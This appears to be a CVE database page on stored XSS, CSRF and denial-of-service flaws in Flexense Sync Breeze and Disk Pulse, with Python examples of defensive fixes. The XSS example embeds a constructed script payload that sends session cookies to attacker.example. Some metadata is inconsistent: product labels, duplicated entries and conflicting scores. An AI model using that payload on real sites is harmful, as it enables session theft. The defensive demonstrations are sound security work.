CVE-2025-59899
Published 2026-01-28
Priority: P4 (27)
Severity: medium, CVSS 3.1 base score 5.4
Vector: AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
EPSS: 0.17% (7.0th percentile)
Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18 contain a persistent authenticated Cross-Site Scripting (XSS) vulnerability. An attacker could send malicious content to an authenticated user and steal information from their session due to insufficient validation of user input in '/server_options?sid=', affecting the 'tasks_logs_dir', 'errors_logs_dir', 'error_notifications_address', 'status_notifications_address', and 'status_reports_address' parameters.
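The advisory describes values that are stored once and then rendered back into the settings page for every administrator who opens it, which is what makes the XSS persistent. The Python example below is added here to illustrate that pattern; it is not code from Flexense or from this page. The form markup, the payload and the validation rules are constructed for the example, and the five field names are the ones the advisory lists. It renders the same settings without and with attribute-context output encoding, and adds an input-side check for the directory and address fields.

```python
import html
import re

# The five /server_options settings named in the advisory.
FIELDS = (
    "tasks_logs_dir",
    "errors_logs_dir",
    "error_notifications_address",
    "status_notifications_address",
    "status_reports_address",
)

# Constructed input for this example (no public exploit is indexed for this
# CVE): a path that closes the value attribute and opens a script element.
STORED_PAYLOAD = (
    'C:\\logs"><script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
)

FORM_OPEN = '<form method="post" action="/server_options">'


def render_server_options_vulnerable(options):
    """Stored XSS pattern: values saved earlier are written back into the
    settings form verbatim, so a stored quote and angle bracket become markup
    for every admin who later opens the page."""
    rows = [f'<input name="{name}" value="{options.get(name, "")}">' for name in FIELDS]
    return FORM_OPEN + "".join(rows) + "</form>"


def render_server_options_hardened(options):
    """Same form, every value encoded for the HTML attribute context:
    html.escape(quote=True) turns & < > " and ' into entities, so a stored
    quote can no longer terminate the attribute."""
    rows = [
        f'<input name="{name}" value="{html.escape(str(options.get(name, "")), quote=True)}">'
        for name in FIELDS
    ]
    return FORM_OPEN + "".join(rows) + "</form>"


# Example input policy, applied when the form is posted. These rules are an
# assumption for this example, not the product's own validation.
_DIR_FORBIDDEN = re.compile(r"[<>\"'\x00-\x1f]")
_ADDRESS = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def validate_server_option(name, value):
    """Return the accepted value or raise ValueError. Directory fields may not
    contain quotes, angle brackets or control characters; address fields must
    be a single mailbox address. Output encoding is still required: validation
    narrows what is stored, encoding makes what is stored safe to render."""
    if name not in FIELDS:
        raise ValueError(f"unknown option {name!r}")
    value = str(value).strip()
    if name.endswith("_dir"):
        if not value or _DIR_FORBIDDEN.search(value):
            raise ValueError(f"{name}: path contains forbidden characters")
    elif not _ADDRESS.match(value):
        raise ValueError(f"{name}: not a valid address")
    return value


def option_accepted(name, value):
    """Accept/reject wrapper around validate_server_option."""
    try:
        validate_server_option(name, value)
    except ValueError:
        return False
    return True


_SCRIPT = re.compile(r"<script\b", re.IGNORECASE)


def script_element_present(markup):
    """True if a live <script element survives in the rendered page."""
    return bool(_SCRIPT.search(markup))


def demo():
    """Store the payload in tasks_logs_dir and render both variants."""
    stored = dict.fromkeys(FIELDS, "")
    stored["tasks_logs_dir"] = STORED_PAYLOAD
    return {
        "vulnerable": script_element_present(render_server_options_vulnerable(stored)),
        "hardened": script_element_present(render_server_options_hardened(stored)),
    }


if __name__ == "__main__":
    print(demo())
```

The encoding step is the fix that closes the CVE class; the input policy only limits what an attacker can persist and would not by itself stop a payload that fits the allowed character set in a different output context.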
Affected (4 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| flexense | disk_pulse_enterprise | — | — |
| flexense | diskpulse | — | — |
| flexense | sync_breeze_enterprise_server | — | — |
| flexense | syncbreeze | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 5.4 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N |
| NVD | 4.0 | 5.1 | MEDIUM | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N (threat, environmental and supplemental metrics all X, i.e. not defined) |
No detection rules found.
No public exploits indexed.
Related Flexense advisories published the same day, as indexed from Wiz:

Wiz: CVE-2025-59896 Impact, Exploitability, and Mitigation Steps (blogs_wiz, CVSS 5.1, MEDIUM)
## CVE-2025-59896: VX Search vulnerability analysis and mitigation
Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18 contain a persistent authenticated Cross-Site Scripting (XSS) vulnerability. An attacker could send malicious content to an authenticated user and steal information from their session due to insufficient validation of user input in '/add_command?sid=', affecting the 'command_name' parameter.
Source: NVD. Published January 28, 2026. Score 5.1 (CNA score 5.1), severity MEDIUM.
Affected technologies: VX Search
Public exploit: No. CISA KEV: No (release date N/A, due date N/A).
EPSS percentile: 2.1; EPSS probability: N/A.
Affected packages and libraries: cpe:2.3:a:flexense:vx
Wiz: CVE-2025-59891 Impact, Exploitability, and Mitigation Steps (blogs_wiz, CVSS 8.5, HIGH)
## CVE-2025-59891: VX Search vulnerability analysis and mitigation
Cross-Site Request Forgery (CSRF) vulnerability in Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18. An authenticated user could cause another user to perform unwanted actions within the application they are logged into. This vulnerability is possible due to the lack of proper CSRF token implementation. Among other things, it is possible, using a POST request, to change a user's password or create users via '/setup_login?sid=', affecting the 'username', 'password', and 'cpassword' parameters.
Source: NVD. Published January 28, 2026. Score 8.5 (CNA score 8.5), severity HIGH.
Affected technologies: VX Search
Public exploit: No. CISA KEV: No (release date N/A).
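The CSRF finding above comes down to a state-changing POST that is accepted without any proof that the request originated from the application's own page. The Python example below is added here and is not the product's code. It models a cookie-bound session (the product's sid query parameter is not modeled), an assumed admin-interface origin, and a /setup_login handler that applies the synchronizer-token pattern with an Origin/Referer check as defense in depth; the request and session classes are stand-ins constructed for the example.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Assumed origin of the admin interface for this example (not from the advisory).
APP_ORIGIN = "https://backup-admin.example.internal:8080"


@dataclass
class Session:
    """Server-side session state. The CSRF token is generated per session and
    is distinct from the session identifier the browser sends."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """Minimal stand-in for an HTTP request: method, headers and form body."""
    method: str
    headers: dict
    form: dict


def setup_login_form(session):
    """The form the server renders. The token rides in a hidden field; a page on
    another origin cannot read it because of the same-origin policy, so it cannot
    build a valid forged submission."""
    return (
        '<form method="post" action="/setup_login">'
        f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'
        '<input name="username"><input type="password" name="password">'
        '<input type="password" name="cpassword"><button>Save</button></form>'
    )


def same_origin(request):
    """Defense in depth: a browser-initiated cross-site POST carries the
    attacker's Origin (or Referer). A missing header is rejected, not trusted."""
    src = request.headers.get("Origin") or request.headers.get("Referer")
    if not src:
        return False
    parts = urlsplit(src)
    return f"{parts.scheme}://{parts.netloc}" == APP_ORIGIN


def csrf_ok(request, session):
    """Synchronizer-token check with a constant-time comparison."""
    supplied = request.form.get("csrf_token", "")
    token_matches = hmac.compare_digest(
        supplied.encode("utf-8"), session.csrf_token.encode("utf-8")
    )
    return same_origin(request) and token_matches


def hash_password(password):
    """Salted PBKDF2 so the example never stores a plaintext password."""
    salt = secrets.token_bytes(16)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 200_000)


def handle_setup_login(request, session, users):
    """Hardened handler for the POST the advisory describes. Returns (status, message)."""
    if request.method != "POST":
        return 405, "method not allowed"
    if not csrf_ok(request, session):
        return 403, "rejected: cross-site request or CSRF token mismatch"
    username = request.form.get("username", "").strip()
    password = request.form.get("password", "")
    if not username or password != request.form.get("cpassword"):
        return 400, "username missing or passwords differ"
    users[username] = hash_password(password)
    return 200, f"credentials updated for {username}"


def demo():
    """Three submissions against one victim session: forged, guessed token, legitimate."""
    users = {}
    victim = Session(user="admin")
    # Forged: the victim's browser submits from the attacker's page. The browser
    # attaches the session automatically, but the page cannot supply the token.
    forged = Request("POST", {"Origin": "https://attacker.example"},
                     {"username": "backdoor", "password": "pwned", "cpassword": "pwned"})
    # Same origin but a guessed token, e.g. from a different session.
    guessed = Request("POST", {"Origin": APP_ORIGIN},
                      {"csrf_token": secrets.token_urlsafe(32), "username": "backdoor",
                       "password": "pwned", "cpassword": "pwned"})
    # Legitimate submission of the rendered form.
    legit = Request("POST", {"Origin": APP_ORIGIN},
                    {"csrf_token": victim.csrf_token, "username": "admin",
                     "password": "correct horse", "cpassword": "correct horse"})
    return {
        "forged": handle_setup_login(forged, victim, users)[0],
        "guessed": handle_setup_login(guessed, victim, users)[0],
        "legit": handle_setup_login(legit, victim, users)[0],
        "backdoor_created": "backdoor" in users,
        "admin_updated": "admin" in users,
    }


if __name__ == "__main__":
    print(demo())
```

The same check belongs on every state-changing endpoint this batch names (/add_command, /rename_command, /delete_command, /delete_all_commands, /add_exclude_dir, /edit_command); a per-endpoint fix leaves the rest forgeable.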
Wiz: CVE-2025-59899 Impact, Exploitability, and Mitigation Steps (blogs_wiz, CVSS 5.1, MEDIUM)
## CVE-2025-59899: VX Search vulnerability analysis and mitigation
Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18 contain a persistent authenticated Cross-Site Scripting (XSS) vulnerability. An attacker could send malicious content to an authenticated user and steal information from their session due to insufficient validation of user input in '/server_options?sid=', affecting the 'tasks_logs_dir', 'errors_logs_dir', 'error_notifications_address', 'status_notifications_address', and 'status_reports_address' parameters.
Source: NVD. Published January 28, 2026. Score 5.1 (CNA score 5.1), severity MEDIUM.
Affected technologies: VX Search
Public exploit: No. CISA KEV: No (release date N/A, due date N/A).
Wiz: CVE-2025-59901 Impact, Exploitability, and Mitigation Steps (blogs_wiz, CVSS 5.1, MEDIUM)
## CVE-2025-59901: VX Search vulnerability analysis and mitigation
Disk Pulse Enterprise v10.4.18 has an authenticated reflected XSS vulnerability in the '/monitor_directory?sid=' endpoint, caused by insufficient validation of the 'monitor_directory' parameter sent by POST. An attacker could exploit this weakness to send malicious content to an authenticated user and steal information from their session.
Source: NVD. Published January 28, 2026. Score 8.5 (CNA score 8.5), severity HIGH as shown in the card body; the listing header for the same entry gives CVSS 5.1, MEDIUM, and the two are not reconciled on the page.
Affected technologies: VX Search
Public exploit: No. CISA KEV: No (release date N/A, due date N/A).
EPSS percentile: 1; EPSS probability: N/A.
Affected packages and libraries: cpe:2.3:a:flexense:vx_search
Sources: NVD, Windows
Wiz: CVE-2025-59900 Impact, Exploitability, and Mitigation Steps (blogs_wiz, CVSS 5.1, MEDIUM)
## CVE-2025-59900: VX Search vulnerability analysis and mitigation
Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18 contain a persistent authenticated Cross-Site Scripting (XSS) vulnerability. An attacker could send malicious content to an authenticated user and steal information from their session due to insufficient validation of user input in '/server_options?sid=', affecting the 'tasks_logs_dir', 'errors_logs_dir', 'error_notifications_address', 'status_notifications_address', and 'status_reports_address' parameters.
Source: NVD. Published January 28, 2026. Score 5.1 (CNA score 5.1), severity MEDIUM.
Affected technologies: VX Search
Public exploit: No. CISA KEV: No (release date N/A, due date N/A).
Wiz: CVE-2025-59893 Impact, Exploitability, and Mitigation Steps (blogs_wiz, CVSS 8.5, HIGH)
## CVE-2025-59893: VX Search vulnerability analysis and mitigation
Cross-Site Request Forgery (CSRF) vulnerability in Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18. An authenticated user could cause another user to perform unwanted actions within the application they are logged into. This vulnerability is possible due to the lack of proper CSRF token implementation. Among other things, it is possible, using a POST request, to rename commands via '/rename_command?sid=', affecting the 'command_name' parameter.
Source: NVD. Published January 28, 2026. Score 8.5 (CNA score 8.5), severity HIGH.
Affected technologies: VX Search
Public exploit: No. CISA KEV: No (release date N/A, due date N/A).
Wiz: CVE-2025-59892 Impact, Exploitability, and Mitigation Steps (blogs_wiz, CVSS 8.5, HIGH)
## CVE-2025-59892: VX Search vulnerability analysis and mitigation
Cross-Site Request Forgery (CSRF) vulnerability in Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18. An authenticated user could cause another user to perform unwanted actions within the application they are logged into. This vulnerability is possible due to the lack of proper CSRF token implementation. Among other things, it is possible, using a POST request, to delete commands individually via '/delete_command?sid=', using the 'cid' parameter.
Source: NVD. Published January 28, 2026. Score 8.5 (CNA score 8.5), severity HIGH.
Affected technologies: VX Search
Public exploit: No. CISA KEV: No (release date N/A, due date N/A).
Wiz: CVE-2025-59895 Impact, Exploitability, and Mitigation Steps (blogs_wiz, CVSS 8.2, HIGH)
## CVE-2025-59895: VX Search vulnerability analysis and mitigation
Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18 contain a remote denial-of-service (DoS) vulnerability in the configuration restore functionality. The issue is due to insufficient validation of user-supplied data during this process. An attacker could send malicious requests to alter the configuration file, causing the application to become unresponsive. In a successful scenario, the service may not recover on its own and may require a complete reinstallation, as the configuration becomes corrupted and prevents the service from restarting, even manually.
Source: NVD. Published January 28, 2026. Score 8.2 (CNA score 8.2), severity HIGH.
Affected technologies: VX Search
Public exploit: No.
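The restore DoS above is a validation and atomicity problem: an uploaded configuration is committed to disk before it is known to be usable, so one malformed upload leaves a service that cannot start and, per the advisory, may need a reinstall. The Python example below is added here and is not the product's code. It shows a restore path that parses and validates the upload before committing, replaces the live file by atomic rename after fsync, keeps the previous file as last-known-good, and falls back to that copy at startup. The JSON layout, key types, the extra max_parallel_tasks key and the size limit are assumptions for the example; only the five setting names come from this CVE batch.

```python
import json
import os
import shutil
import tempfile
from pathlib import Path

# Constructed schema for the example. The five *_dir / *_address names are the
# settings this CVE batch mentions; the types, max_parallel_tasks and its bounds
# are assumptions, not the product's real configuration format.
SCHEMA = {
    "tasks_logs_dir": str,
    "errors_logs_dir": str,
    "error_notifications_address": str,
    "status_notifications_address": str,
    "status_reports_address": str,
    "max_parallel_tasks": int,
}
MAX_UPLOAD_BYTES = 64 * 1024  # example cap on a restore upload


def validate_config(cfg):
    """Return a list of problems; an empty list means the config is usable."""
    if not isinstance(cfg, dict):
        return ["top-level value is not an object"]
    problems = []
    for key, typ in SCHEMA.items():
        if key not in cfg:
            problems.append(f"missing key: {key}")
        elif not isinstance(cfg[key], typ) or isinstance(cfg[key], bool):
            problems.append(f"wrong type for {key}: expected {typ.__name__}")
    problems.extend(f"unknown key: {key}" for key in cfg if key not in SCHEMA)
    n = cfg.get("max_parallel_tasks")
    if isinstance(n, int) and not isinstance(n, bool) and not 1 <= n <= 64:
        problems.append("max_parallel_tasks out of range 1..64")
    return problems


def backup_path(config_path):
    """Last-known-good copy kept next to the live file."""
    return config_path.with_name(config_path.name + ".bak")


def restore_config(config_path, upload):
    """Apply an uploaded configuration only after it parses and validates.
    New content is written to a temp file and fsynced, the previous live file
    is copied aside, then the temp file is renamed over the live one, so no
    crash or bad upload can leave a half-written file. Returns (applied, reason)."""
    if len(upload) > MAX_UPLOAD_BYTES:
        return False, "upload too large"
    try:
        cfg = json.loads(upload.decode("utf-8"))
    except (UnicodeDecodeError, ValueError) as exc:
        return False, f"unparseable config: {type(exc).__name__}"
    problems = validate_config(cfg)
    if problems:
        return False, "; ".join(problems)
    fd, tmp_name = tempfile.mkstemp(dir=config_path.parent, prefix=".config-", suffix=".tmp")
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        json.dump(cfg, fh, indent=2)
        fh.flush()
        os.fsync(fh.fileno())
    if config_path.exists():
        shutil.copy2(config_path, backup_path(config_path))
    os.replace(tmp_name, config_path)
    return True, "configuration replaced"


def load_config(config_path):
    """Startup path: prefer the live file, fall back to the last-known-good copy
    instead of refusing to start. Returns (config, source)."""
    for candidate, label in ((config_path, "live"), (backup_path(config_path), "backup")):
        try:
            cfg = json.loads(candidate.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        if not validate_config(cfg):
            return cfg, label
    raise RuntimeError("no usable configuration found")


GOOD_CONFIG = {  # constructed sample configuration
    "tasks_logs_dir": "C:/SyncBreeze/logs/tasks",
    "errors_logs_dir": "C:/SyncBreeze/logs/errors",
    "error_notifications_address": "ops@example.com",
    "status_notifications_address": "ops@example.com",
    "status_reports_address": "reports@example.com",
    "max_parallel_tasks": 4,
}


def run_demo():
    """Exercise restore with a truncated upload, a wrongly typed upload, a valid
    upload, and a live file corrupted afterwards. Returns the observed results."""
    with tempfile.TemporaryDirectory() as d:
        path = Path(d) / "config.json"
        path.write_text(json.dumps(GOOD_CONFIG), encoding="utf-8")
        out = {}
        out["truncated"] = restore_config(path, b'{"tasks_logs_dir": "C:/logs"')[0]
        bad_type = {**GOOD_CONFIG, "max_parallel_tasks": "lots"}
        out["wrong_type"] = restore_config(path, json.dumps(bad_type).encode())[0]
        out["live_intact"] = json.loads(path.read_text(encoding="utf-8")) == GOOD_CONFIG
        updated = {**GOOD_CONFIG, "max_parallel_tasks": 8}
        out["valid"] = restore_config(path, json.dumps(updated).encode())[0]
        out["live_updated"] = load_config(path) == (updated, "live")
        path.write_text("{ not json", encoding="utf-8")  # simulate later corruption
        cfg, source = load_config(path)
        out["fallback"] = (source, cfg["max_parallel_tasks"])
        return out


if __name__ == "__main__":
    print(run_demo())
```

The validate-then-rename order is the part that removes the reinstall scenario: a rejected upload never touches the live file, and a corrupted live file still leaves a validated backup for the service to start from.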
Wiz: CVE-2025-59894 Impact, Exploitability, and Mitigation Steps (blogs_wiz, CVSS 8.5, HIGH)
## CVE-2025-59894: VX Search vulnerability analysis and mitigation
Cross-Site Request Forgery (CSRF) vulnerability in Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18. An authenticated user could cause another user to perform unwanted actions within the application they are logged into. This vulnerability is possible due to the lack of proper CSRF token implementation. Among other things, it is possible, using a POST request, to delete all commands via '/delete_all_commands?sid='.
Source: NVD. Published January 28, 2026. Score 8.5 (CNA score 8.5), severity HIGH.
Affected technologies: VX Search
Public exploit: No. CISA KEV: No (release date N/A, due date N/A).
EPSS percentile: 6.4.
Wiz: CVE-2025-59898 Impact, Exploitability, and Mitigation Steps (blogs_wiz, CVSS 5.1, MEDIUM)
## CVE-2025-59898: VX Search vulnerability analysis and mitigation
Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18 contain a persistent authenticated Cross-Site Scripting (XSS) vulnerability. An attacker could send malicious content to an authenticated user and steal information from their session due to insufficient validation of user input in '/add_exclude_dir?sid=', affecting the 'exclude_dir' parameter.
Source: NVD. Published January 28, 2026. Score 5.1 (CNA score 5.1), severity MEDIUM.
Affected technologies: VX Search
Public exploit: No. CISA KEV: No (release date N/A, due date N/A).
EPSS percentile: 2.1; EPSS probability: N/A.
Affected packages and libraries: cpe:2.3:a:flexense
Wiz: CVE-2025-59897 Impact, Exploitability, and Mitigation Steps (blogs_wiz, CVSS 5.1, MEDIUM)
## CVE-2025-59897: VX Search vulnerability analysis and mitigation
Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18 contain a persistent authenticated Cross-Site Scripting (XSS) vulnerability. An attacker could send malicious content to an authenticated user and steal information from their session due to insufficient validation of user input in '/edit_command?sid=', affecting the 'source_dir' and 'dest_dir' parameters.
Source: NVD. Published January 28, 2026. Score 5.1 (CNA score 5.1), severity MEDIUM.
Affected technologies: VX Search
Public exploit: No. CISA KEV: No (release date N/A, due date N/A).
EPSS percentile: 2.1; EPSS probability: N/A.
Affected packages and libraries: cpe:2.